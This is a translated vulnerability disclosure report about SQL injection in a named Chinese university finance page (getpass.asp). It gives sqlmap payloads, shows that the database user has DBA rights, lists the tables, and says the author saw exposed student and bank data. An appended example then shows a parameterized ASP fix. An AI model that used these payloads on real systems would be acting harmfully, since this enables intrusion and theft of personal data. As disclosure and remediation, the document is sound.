2015-01-13: Details have been sent to the vendor and are awaiting the vendor's handling.
2015-01-18: The vendor has proactively ignored the vulnerability; details are disclosed to the public.
'sa' privileges, painful to look at. Student information and bank account information are all in there!! (-__-)
Page: http://cwc.hnust.cn/pay/getpass.asp
Append a ' and submit: the page returns an error.
Captured request:
The submitted data is visible in the capture. Straight into sqlmap.
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=1212020202' AND 7443=7443 AND 'yDal'='yDal

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: username=-9863' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(87)+CHAR(97)+CHAR(119)+CHAR(82)+CHAR(87)+CHAR(69)+CHAR(104)+CHAR(122)+CHAR(73)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113),NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: username=1212020202'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: username=1212020202' WAITFOR DELAY '0:0:5'--
---
[03:48:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[03:48:13] [INFO] testing if current user is DBA
current user is DBA: True
[03:48:13] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[03:48:13] [INFO] fetched data logged to text files under 'C:\Users\ERIC\.sqlmap\output\cwc.hnust.cn'
Still dba.
[03:53:04] [INFO] testing if current user is DBA
current user is DBA: True
Then I checked how many databases there are.
Picking a database at random already gives about 250 tables.
Database: xssf5
[246 tables]
DM_UF_MX, DM_UF_MX, FS_RECORD, LX_DM, LX_SFB1, LX_SFB1, LX_SFMX, PBJDM, PBJSFBZ, PBMDM,
PCXKC, PDJBH, PDKLX, PDWDY, PDWLXDM, PDWSJX, PEXPORT_LM, PEXPORT_LM, PFSSFXM, PFXDM,
PGNDM, PGSDY, PIMPORT_LM, PIMPORT_LM, PJSFSDM, PJ_LYB, PJ_MXB, PKCDM, PMKDM, PMZDM,
PQUERY_FIELD_TMP, PQUERY_FIELD_TMP, PQUERY_FIELD_TMP, PQUERY_TABLE, PQUERY_TJ, PQUERY_TMP, PQXDM_FX, PQXDM_FX, PSCWJDY, PSFQJDZ,
PSFQJDZ, PSFXMLX, PSFXMLX, PSFYXJ, PTXXX, PXQDM, PXSDM_BAK, PXSDM_BAK, PXSLB, PXSLY,
PXSSFBZ_MX, PXSSFBZ_MX, PXSTZ_MX, PXSXZ, PXSZT, PXTCS, PXXXX, PYHCWDM, PYHDM, PYHSSZ,
PYHZDM, PYSKZY, PYYDM, PZBLM, PZCBZB, PZJLB, PZYDM, PZYLXDM, SF_BBDY_MX, SF_BBDY_MX,
SF_CESFDB, SF_CESFDMX, SF_CXFB, SF_CXFMX, SF_DJGL, SF_HJDB_DEL, SF_HJDB_DEL, SF_HJDMX_DEL, SF_HJDMX_DEL, SF_JMDB_BAK,
SF_JMDB_BAK, SF_JMDB_DEL, SF_JMDMX_BAK, SF_JMDMX_BAK, SF_JMDMX_DEL, SF_LOG, SF_PZMB1, SF_PZMB1, SF_PZMBGS, SF_PZMBMX,
SF_QYB, SF_SFDB_BAK, SF_SFDB_BAK, SF_SFDB_DEL, SF_SFDB_RY, SF_SFDDC, SF_SFDMX_BAK, SF_SFDMX_BAK, SF_SFDMX_DEL, SF_SFDMX_DY,
SF_SFDMX_RY, SF_SFDY_LOG, SF_SFD_DY, SF_SFD_FP, SF_SSDK_PL, SF_SSDK_PL, SF_SSDK_QY, SF_SS_YH, SF_TFDB_BAK, SF_TFDB_BAK,
SF_TFDB_DEL, SF_TFDDC, SF_TFDMX_BAK, SF_TFDMX_BAK, SF_TFDMX_DEL, SF_TFD_FP, SF_XESFDB, SF_XESFDMX, SF_XXDL, SF_YHDS_LSH,
SF_YHDS_TKB, SF_YHDS_XF, SF_YSKBZ, SF_YSKTZ_MX_BAK, SF_YSKTZ_MX_BAK, SF_YSK_BAK, SF_YSK_BAK, SF_YSK_CD, SF_YSK_DK, SF_YSK_FP,
SF_YSK_TMP, SF_ZXDKBZ, SF_ZZ_BAK, SF_ZZ_BAK, T_zs_ylpos_tmp, T_zs_ylpos_tmp, V_CXFXS, V_CXMXZ, V_HJMXZ, V_JMD,
V_JMDXS, V_JMLXMXZ, V_JMLXXS, V_JMMXZ_LS, V_JMMXZ_LS, V_SFD, V_SFDXS, V_SFLXMXZ_LS, V_SFLXMXZ_LS, V_SFLXXS,
V_SFLXZZ, V_SFLXZZXS, V_SFMXZ_LS, V_SFMXZ_LS, V_SFZZ, V_SFZZXS, V_TABLE, V_TFD, V_TFDXS, V_TFLXMXZ,
V_TFLXXS, V_TFMXZ_LS, V_TFMXZ_LS, V_XESFLXMXZ, V_XESFMXZ, V_XSDM, V_YSKLX, V_YSKLX, V_YSKLXXS, V_YSKXS,
V_jfxxb, WY_SSDK, XF_XFGL_TMP, XF_XFGL_TMP, ckd_xyp, dtproperties, gs_table, nfsf2_bjdmzs, nfsf2_pjnmb, nfsf2_plog,
nfsf2_pxtcs, nfsf2_vzz, nfsf2_xsdmzs, nfsf_vsfzz, pjgl_glb, pjgl_lyb, pjgl_mxb, seed, sf_jks_temp, sf_jsfsb,
sf_jzhj, sf_pkyh, sf_poslog, sf_qfqk_htemp1, sf_sgpjzhj, sf_sqltj, sf_xtrz, sf_yhpk_ls, sf_yhpk_mx, sf_yhpk_temp,
sf_yhyjfk, sysconstraints, syssegments, sysxszdkz, t_zs_czwh, t_zs_dlyhwh, t_zs_dtwh, t_zs_dwdz, t_zs_dwpjgj, t_zs_dwxmgj,
t_zs_ggb, t_zs_jzhjxx, t_zs_pjkpxx, t_zs_pjls_tmp, t_zs_pjls_tmp, t_zs_pjwh, t_zs_pjzl, t_zs_srlb, t_zs_xmxx, t_zs_ypsq,
t_zs_zgwh, t_zs_zsdw, temp_bmbjxztjb_xyp, temp_bmjfqkb_xyp, temp_bmrshzb_xyp, temp_sfqkzhtjb_xyp, temp_xsysfhzb_xyp, tmp_jq, txs13, tzf14,
tzj14, tzs, v_cxfzz, wy_bank, wy_bwjg, wy_bwlx, wy_bwlxzddy, wy_fs, wy_js, wy_pagid,
wy_xxdl, wy_yh_xtcs, xe_mxz, xe_sfzz, xe_zh, 客户编号
Since the table names are all pinyin abbreviations and hard to recognize, I just tried a few tables at random: student IDs, bank account numbers, names... a very large volume, covering almost every year from 2005 to now.
Not interested in dumping the data~, leaving!
Filter the input.
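The fix the report asks for, shown as an added example that is not the original getpass.asp and not code from the vendor: a classic ASP handler in the shape the sqlmap output implies (a username from a POST form spliced into a query), with the vulnerable concatenation left as a comment beside the parameterized ADODB.Command version. The table and column names (users, pwd), the connection string and the restricted login name are assumptions for illustration; the real page's schema is not on the page.

```asp
<%
' Added example, not the original getpass.asp. Table/column names,
' the connection string and the login "getpass_ro" are assumed.
Option Explicit
Const adCmdText = 1, adVarChar = 200, adParamInput = 1

Dim username, conn, cmd, rs
username = Request.Form("username")

Set conn = Server.CreateObject("ADODB.Connection")
' Connect as a login that can only read the tables this page needs, never as
' sa: with sa, one injection point hands over every database on the server,
' which is exactly what "current user is DBA: True" above means.
conn.Open "Provider=SQLOLEDB;Data Source=DBHOST;Initial Catalog=APPDB;User ID=getpass_ro;Password=***"

' VULNERABLE pattern (what the boolean, UNION, stacked and WAITFOR payloads
' above rely on): the user string becomes part of the SQL text, so a single
' quote closes the literal and whatever follows runs as SQL. Left here only
' as the "before" of the fix; do not use.
' Set rs = conn.Execute("SELECT pwd FROM users WHERE username = '" & username & "'")

' HARDENED: the value is sent as a typed parameter, never as SQL text, so a
' quote, AND 7443=7443, UNION ALL SELECT or ; WAITFOR DELAY are just
' characters compared against the username column. Filtering alone is weaker:
' this removes the concatenation instead of trying to guess every bad input.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT pwd FROM users WHERE username = ?"
cmd.Parameters.Append cmd.CreateParameter("@username", adVarChar, adParamInput, 20, username)
Set rs = cmd.Execute

If rs.EOF Then
    Response.Write "not found"
Else
    ' Never echo the stored credential back; start a reset flow instead.
    Response.Write "ok"
End If

rs.Close
conn.Close
%>
```

Two further points follow from the report: the raw database error that the single quote triggered is what revealed the injection point, so IIS custom error pages should replace detailed ADO errors with a generic message; and the parameter length (20 here, an assumption) should match the column, because oversize input is rejected before it reaches the query.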
Severity: no impact (vendor ignored)
Ignored at: 2015-01-18 14:50
Vendor comment: none